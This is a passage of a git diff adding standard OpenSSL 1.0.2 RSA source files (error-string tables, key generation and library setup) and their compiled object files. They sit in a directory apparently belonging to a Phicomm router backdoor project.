+     "RSA_padding_check_PKCS1_OAEP"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_CHECK_PKCS1_OAEP_MGF1),
+     "RSA_padding_check_PKCS1_OAEP_mgf1"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_1),
+     "RSA_padding_check_PKCS1_type_1"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_2),
+     "RSA_padding_check_PKCS1_type_2"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_CHECK_SSLV23), "RSA_padding_check_SSLv23"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_CHECK_X931), "RSA_padding_check_X931"},
+    {ERR_FUNC(RSA_F_RSA_PRINT), "RSA_print"},
+    {ERR_FUNC(RSA_F_RSA_PRINT_FP), "RSA_print_fp"},
+    {ERR_FUNC(RSA_F_RSA_PRIVATE_DECRYPT), "RSA_private_decrypt"},
+    {ERR_FUNC(RSA_F_RSA_PRIVATE_ENCRYPT), "RSA_private_encrypt"},
+    {ERR_FUNC(RSA_F_RSA_PRIV_DECODE), "RSA_PRIV_DECODE"},
+    {ERR_FUNC(RSA_F_RSA_PRIV_ENCODE), "RSA_PRIV_ENCODE"},
+    {ERR_FUNC(RSA_F_RSA_PSS_TO_CTX), "RSA_PSS_TO_CTX"},
+    {ERR_FUNC(RSA_F_RSA_PUBLIC_DECRYPT), "RSA_public_decrypt"},
+    {ERR_FUNC(RSA_F_RSA_PUBLIC_ENCRYPT), "RSA_public_encrypt"},
+    {ERR_FUNC(RSA_F_RSA_PUB_DECODE), "RSA_PUB_DECODE"},
+    {ERR_FUNC(RSA_F_RSA_SETUP_BLINDING), "RSA_setup_blinding"},
+    {ERR_FUNC(RSA_F_RSA_SIGN), "RSA_sign"},
+    {ERR_FUNC(RSA_F_RSA_SIGN_ASN1_OCTET_STRING),
+     "RSA_sign_ASN1_OCTET_STRING"},
+    {ERR_FUNC(RSA_F_RSA_VERIFY), "RSA_verify"},
+    {ERR_FUNC(RSA_F_RSA_VERIFY_ASN1_OCTET_STRING),
+     "RSA_verify_ASN1_OCTET_STRING"},
+    {ERR_FUNC(RSA_F_RSA_VERIFY_PKCS1_PSS), "RSA_verify_PKCS1_PSS"},
+    {ERR_FUNC(RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1), "RSA_verify_PKCS1_PSS_mgf1"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA RSA_str_reasons[] = {
+    {ERR_REASON(RSA_R_ALGORITHM_MISMATCH), "algorithm mismatch"},
+    {ERR_REASON(RSA_R_BAD_E_VALUE), "bad e value"},
+    {ERR_REASON(RSA_R_BAD_FIXED_HEADER_DECRYPT), "bad fixed header decrypt"},
+    {ERR_REASON(RSA_R_BAD_PAD_BYTE_COUNT), "bad pad byte count"},
+    {ERR_REASON(RSA_R_BAD_SIGNATURE), "bad signature"},
+    {ERR_REASON(RSA_R_BLOCK_TYPE_IS_NOT_01), "block type is not 01"},
+    {ERR_REASON(RSA_R_BLOCK_TYPE_IS_NOT_02), "block type is not 02"},
+    {ERR_REASON(RSA_R_DATA_GREATER_THAN_MOD_LEN),
+     "data greater than mod len"},
+    {ERR_REASON(RSA_R_DATA_TOO_LARGE), "data too large"},
+    {ERR_REASON(RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE),
+     "data too large for key size"},
+    {ERR_REASON(RSA_R_DATA_TOO_LARGE_FOR_MODULUS),
+     "data too large for modulus"},
+    {ERR_REASON(RSA_R_DATA_TOO_SMALL), "data too small"},
+    {ERR_REASON(RSA_R_DATA_TOO_SMALL_FOR_KEY_SIZE),
+     "data too small for key size"},
+    {ERR_REASON(RSA_R_DIGEST_DOES_NOT_MATCH), "digest does not match"},
+    {ERR_REASON(RSA_R_DIGEST_TOO_BIG_FOR_RSA_KEY),
+     "digest too big for rsa key"},
+    {ERR_REASON(RSA_R_DMP1_NOT_CONGRUENT_TO_D), "dmp1 not congruent to d"},
+    {ERR_REASON(RSA_R_DMQ1_NOT_CONGRUENT_TO_D), "dmq1 not congruent to d"},
+    {ERR_REASON(RSA_R_D_E_NOT_CONGRUENT_TO_1), "d e not congruent to 1"},
+    {ERR_REASON(RSA_R_FIRST_OCTET_INVALID), "first octet invalid"},
+    {ERR_REASON(RSA_R_ILLEGAL_OR_UNSUPPORTED_PADDING_MODE),
+     "illegal or unsupported padding mode"},
+    {ERR_REASON(RSA_R_INVALID_DIGEST), "invalid digest"},
+    {ERR_REASON(RSA_R_INVALID_DIGEST_LENGTH), "invalid digest length"},
+    {ERR_REASON(RSA_R_INVALID_HEADER), "invalid header"},
+    {ERR_REASON(RSA_R_INVALID_KEYBITS), "invalid keybits"},
+    {ERR_REASON(RSA_R_INVALID_LABEL), "invalid label"},
+    {ERR_REASON(RSA_R_INVALID_MESSAGE_LENGTH), "invalid message length"},
+    {ERR_REASON(RSA_R_INVALID_MGF1_MD), "invalid mgf1 md"},
+    {ERR_REASON(RSA_R_INVALID_OAEP_PARAMETERS), "invalid oaep parameters"},
+    {ERR_REASON(RSA_R_INVALID_PADDING), "invalid padding"},
+    {ERR_REASON(RSA_R_INVALID_PADDING_MODE), "invalid padding mode"},
+    {ERR_REASON(RSA_R_INVALID_PSS_PARAMETERS), "invalid pss parameters"},
+    {ERR_REASON(RSA_R_INVALID_PSS_SALTLEN), "invalid pss saltlen"},
+    {ERR_REASON(RSA_R_INVALID_SALT_LENGTH), "invalid salt length"},
+    {ERR_REASON(RSA_R_INVALID_TRAILER), "invalid trailer"},
+    {ERR_REASON(RSA_R_INVALID_X931_DIGEST), "invalid x931 digest"},
+    {ERR_REASON(RSA_R_IQMP_NOT_INVERSE_OF_Q), "iqmp not inverse of q"},
+    {ERR_REASON(RSA_R_KEY_SIZE_TOO_SMALL), "key size too small"},
+    {ERR_REASON(RSA_R_LAST_OCTET_INVALID), "last octet invalid"},
+    {ERR_REASON(RSA_R_MODULUS_TOO_LARGE), "modulus too large"},
+    {ERR_REASON(RSA_R_NON_FIPS_RSA_METHOD), "non fips rsa method"},
+    {ERR_REASON(RSA_R_NO_PUBLIC_EXPONENT), "no public exponent"},
+    {ERR_REASON(RSA_R_NULL_BEFORE_BLOCK_MISSING),
+     "null before block missing"},
+    {ERR_REASON(RSA_R_N_DOES_NOT_EQUAL_P_Q), "n does not equal p q"},
+    {ERR_REASON(RSA_R_OAEP_DECODING_ERROR), "oaep decoding error"},
+    {ERR_REASON(RSA_R_OPERATION_NOT_ALLOWED_IN_FIPS_MODE),
+     "operation not allowed in fips mode"},
+    {ERR_REASON(RSA_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE),
+     "operation not supported for this keytype"},
+    {ERR_REASON(RSA_R_PADDING_CHECK_FAILED), "padding check failed"},
+    {ERR_REASON(RSA_R_PKCS_DECODING_ERROR), "pkcs decoding error"},
+    {ERR_REASON(RSA_R_P_NOT_PRIME), "p not prime"},
+    {ERR_REASON(RSA_R_Q_NOT_PRIME), "q not prime"},
+    {ERR_REASON(RSA_R_RSA_OPERATIONS_NOT_SUPPORTED),
+     "rsa operations not supported"},
+    {ERR_REASON(RSA_R_SLEN_CHECK_FAILED), "salt length check failed"},
+    {ERR_REASON(RSA_R_SLEN_RECOVERY_FAILED), "salt length recovery failed"},
+    {ERR_REASON(RSA_R_SSLV3_ROLLBACK_ATTACK), "sslv3 rollback attack"},
+    {ERR_REASON(RSA_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD),
+     "the asn1 object identifier is not known for this md"},
+    {ERR_REASON(RSA_R_UNKNOWN_ALGORITHM_TYPE), "unknown algorithm type"},
+    {ERR_REASON(RSA_R_UNKNOWN_DIGEST), "unknown digest"},
+    {ERR_REASON(RSA_R_UNKNOWN_MASK_DIGEST), "unknown mask digest"},
+    {ERR_REASON(RSA_R_UNKNOWN_PADDING_TYPE), "unknown padding type"},
+    {ERR_REASON(RSA_R_UNKNOWN_PSS_DIGEST), "unknown pss digest"},
+    {ERR_REASON(RSA_R_UNSUPPORTED_ENCRYPTION_TYPE),
+     "unsupported encryption type"},
+    {ERR_REASON(RSA_R_UNSUPPORTED_LABEL_SOURCE), "unsupported label source"},
+    {ERR_REASON(RSA_R_UNSUPPORTED_MASK_ALGORITHM),
+     "unsupported mask algorithm"},
+    {ERR_REASON(RSA_R_UNSUPPORTED_MASK_PARAMETER),
+     "unsupported mask parameter"},
+    {ERR_REASON(RSA_R_UNSUPPORTED_SIGNATURE_TYPE),
+     "unsupported signature type"},
+    {ERR_REASON(RSA_R_VALUE_MISSING), "value missing"},
+    {ERR_REASON(RSA_R_WRONG_SIGNATURE_LENGTH), "wrong signature length"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_RSA_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(RSA_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, RSA_str_functs);
+        ERR_load_strings(0, RSA_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..5c1756471beacb7d3ea4fbe4a30f35bd330e1948
GIT binary patch
literal 1360
zcmbtS%}T>S5S}#tR9o-|4}v1`q@pgZKZqWrQmPjbsT90ONZZ(oZCa8oSP%LNK8lY}
z@CAGfkBT=hI@9c?+qEL-z+`5=oo{}!d!IW#j2Q+<F<>8hkwgJbV?969bu*BJ1iViy
zd_2KXHoIpn7m6*9x2#>Z$x`d-omMwY-)*E=YHKBgVF<aCsKcm7Ck4Q=9l}ghl9|we
zahnI@X405Tj>aEwAj0Rx8F7CT+F=OZJ_qHQ12?1@lqD6S8BM2v=$hRv`Z0=382Ju%
z@zEb}`UCxvz;IfbGuqh?9NYDMR)SnUZ`T@5+0LIG*a7#iyh;F;C_|g{ZNq|gojXNf
zm>Jrt^tgM&ft4NZ04oLouu`L5cRj?s26q`=(|W+2(zS>yUW+yTM$`3q8<_9b9OhQ-
zOW&!xqWM3}9CGRI^goypHKYF^V#-xz5d*^Hdy;24>1bBxFX4F{^{@Oj<WkKPsw%So
zstTen`%Am6U}|bp4HRGUBt(7amG#{{#*%NLuL|v|$^`~gQ|CX3Bz-TPe~x+dnlmC_
znrAWStN_N)(wven@j<<b(xDH^YiM8`E!EKZgz0xjlt<CuqCgP=N5~X<gZM8Zu@Ys5
Hj?VuA_ZLsK

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_gen.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_gen.c
new file mode 100644
index 0000000..2465fbd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_gen.c
@@ -0,0 +1,248 @@
+/* crypto/rsa/rsa_gen.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * NB: these functions have been "upgraded", the deprecated versions (which
+ * are compatibility wrappers using these functions) are in rsa_depr.c. -
+ * Geoff
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+static int rsa_builtin_keygen(RSA *rsa, int bits, BIGNUM *e_value,
+                              BN_GENCB *cb);
+
+/*
+ * NB: this wrapper would normally be placed in rsa_lib.c and the static
+ * implementation would probably be in rsa_eay.c. Nonetheless, is kept here
+ * so that we don't introduce a new linker dependency. Eg. any application
+ * that wasn't previously linking object code related to key-generation won't
+ * have to now just because key-generation is part of RSA_METHOD.
+ */
+int RSA_generate_key_ex(RSA *rsa, int bits, BIGNUM *e_value, BN_GENCB *cb)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(rsa->meth->flags & RSA_FLAG_FIPS_METHOD)
+        && !(rsa->flags & RSA_FLAG_NON_FIPS_ALLOW)) {
+        RSAerr(RSA_F_RSA_GENERATE_KEY_EX, RSA_R_NON_FIPS_RSA_METHOD);
+        return 0;
+    }
+#endif
+    if (rsa->meth->rsa_keygen)
+        return rsa->meth->rsa_keygen(rsa, bits, e_value, cb);
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return FIPS_rsa_generate_key_ex(rsa, bits, e_value, cb);
+#endif
+    return rsa_builtin_keygen(rsa, bits, e_value, cb);
+}
+
+static int rsa_builtin_keygen(RSA *rsa, int bits, BIGNUM *e_value,
+                              BN_GENCB *cb)
+{
+    BIGNUM *r0 = NULL, *r1 = NULL, *r2 = NULL, *r3 = NULL, *tmp;
+    BIGNUM local_r0, local_d, local_p;
+    BIGNUM *pr0, *d, *p;
+    int bitsp, bitsq, ok = -1, n = 0;
+    BN_CTX *ctx = NULL;
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    r0 = BN_CTX_get(ctx);
+    r1 = BN_CTX_get(ctx);
+    r2 = BN_CTX_get(ctx);
+    r3 = BN_CTX_get(ctx);
+    if (r3 == NULL)
+        goto err;
+
+    bitsp = (bits + 1) / 2;
+    bitsq = bits - bitsp;
+
+    /* We need the RSA components non-NULL */
+    if (!rsa->n && ((rsa->n = BN_new()) == NULL))
+        goto err;
+    if (!rsa->d && ((rsa->d = BN_new()) == NULL))
+        goto err;
+    if (!rsa->e && ((rsa->e = BN_new()) == NULL))
+        goto err;
+    if (!rsa->p && ((rsa->p = BN_new()) == NULL))
+        goto err;
+    if (!rsa->q && ((rsa->q = BN_new()) == NULL))
+        goto err;
+    if (!rsa->dmp1 && ((rsa->dmp1 = BN_new()) == NULL))
+        goto err;
+    if (!rsa->dmq1 && ((rsa->dmq1 = BN_new()) == NULL))
+        goto err;
+    if (!rsa->iqmp && ((rsa->iqmp = BN_new()) == NULL))
+        goto err;
+
+    BN_copy(rsa->e, e_value);
+
+    /* generate p and q */
+    for (;;) {
+        if (!BN_generate_prime_ex(rsa->p, bitsp, 0, NULL, NULL, cb))
+            goto err;
+        if (!BN_sub(r2, rsa->p, BN_value_one()))
+            goto err;
+        if (!BN_gcd(r1, r2, rsa->e, ctx))
+            goto err;
+        if (BN_is_one(r1))
+            break;
+        if (!BN_GENCB_call(cb, 2, n++))
+            goto err;
+    }
+    if (!BN_GENCB_call(cb, 3, 0))
+        goto err;
+    for (;;) {
+        /*
+         * When generating ridiculously small keys, we can get stuck
+         * continually regenerating the same prime values. Check for this and
+         * bail if it happens 3 times.
+         */
+        unsigned int degenerate = 0;
+        do {
+            if (!BN_generate_prime_ex(rsa->q, bitsq, 0, NULL, NULL, cb))
+                goto err;
+        } while ((BN_cmp(rsa->p, rsa->q) == 0) && (++degenerate < 3));
+        if (degenerate == 3) {
+            ok = 0;             /* we set our own err */
+            RSAerr(RSA_F_RSA_BUILTIN_KEYGEN, RSA_R_KEY_SIZE_TOO_SMALL);
+            goto err;
+        }
+        if (!BN_sub(r2, rsa->q, BN_value_one()))
+            goto err;
+        if (!BN_gcd(r1, r2, rsa->e, ctx))
+            goto err;
+        if (BN_is_one(r1))
+            break;
+        if (!BN_GENCB_call(cb, 2, n++))
+            goto err;
+    }
+    if (!BN_GENCB_call(cb, 3, 1))
+        goto err;
+    if (BN_cmp(rsa->p, rsa->q) < 0) {
+        tmp = rsa->p;
+        rsa->p = rsa->q;
+        rsa->q = tmp;
+    }
+
+    /* calculate n */
+    if (!BN_mul(rsa->n, rsa->p, rsa->q, ctx))
+        goto err;
+
+    /* calculate d */
+    if (!BN_sub(r1, rsa->p, BN_value_one()))
+        goto err;               /* p-1 */
+    if (!BN_sub(r2, rsa->q, BN_value_one()))
+        goto err;               /* q-1 */
+    if (!BN_mul(r0, r1, r2, ctx))
+        goto err;               /* (p-1)(q-1) */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        pr0 = &local_r0;
+        BN_with_flags(pr0, r0, BN_FLG_CONSTTIME);
+    } else
+        pr0 = r0;
+    if (!BN_mod_inverse(rsa->d, rsa->e, pr0, ctx))
+        goto err;               /* d */
+
+    /* set up d for correct BN_FLG_CONSTTIME flag */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        d = &local_d;
+        BN_with_flags(d, rsa->d, BN_FLG_CONSTTIME);
+    } else
+        d = rsa->d;
+
+    /* calculate d mod (p-1) */
+    if (!BN_mod(rsa->dmp1, d, r1, ctx))
+        goto err;
+
+    /* calculate d mod (q-1) */
+    if (!BN_mod(rsa->dmq1, d, r2, ctx))
+        goto err;
+
+    /* calculate inverse of q mod p */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        p = &local_p;
+        BN_with_flags(p, rsa->p, BN_FLG_CONSTTIME);
+    } else
+        p = rsa->p;
+    if (!BN_mod_inverse(rsa->iqmp, rsa->q, p, ctx))
+        goto err;
+
+    ok = 1;
+ err:
+    if (ok == -1) {
+        RSAerr(RSA_F_RSA_BUILTIN_KEYGEN, ERR_LIB_BN);
+        ok = 0;
+    }
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+
+    return ok;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_gen.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_gen.o
new file mode 100644
index 0000000000000000000000000000000000000000..c40f208adb8fdb7741fe1692886d3c3c338ac9a4
GIT binary patch
literal 4616
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
E18C4k4*&oF

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_lib.c
new file mode 100644
index 0000000..a6805de
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_lib.c
@@ -0,0 +1,336 @@
+/* crypto/rsa/rsa_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+const char RSA_version[] = "RSA" OPENSSL_VERSION_PTEXT;
+
+static const RSA_METHOD *default_RSA_meth = NULL;
+
+RSA *RSA_new(void)
+{
+    RSA *r = RSA_new_method(NULL);
+
+    return r;
+}
+
+void RSA_set_default_method(const RSA_METHOD *meth)
+{
+    default_RSA_meth = meth;
+}
+
+const RSA_METHOD *RSA_get_default_method(void)
+{
+    if (default_RSA_meth == NULL) {
+#ifdef OPENSSL_FIPS
+        if (FIPS_mode())
+            return FIPS_rsa_pkcs1_ssleay();
+        else
+            return RSA_PKCS1_SSLeay();
+#else
+# ifdef RSA_NULL
+        default_RSA_meth = RSA_null_method();
+# else
+        default_RSA_meth = RSA_PKCS1_SSLeay();
+# endif
+#endif
+    }
+
+    return default_RSA_meth;
+}
+
+const RSA_METHOD *RSA_get_method(const RSA *rsa)
+{
+    return rsa->meth;
+}
+
+int RSA_set_method(RSA *rsa, const RSA_METHOD *meth)
+{
+    /*
+     * NB: The caller is specifically setting a method, so it's not up to us
+     * to deal with which ENGINE it comes from.
+     */
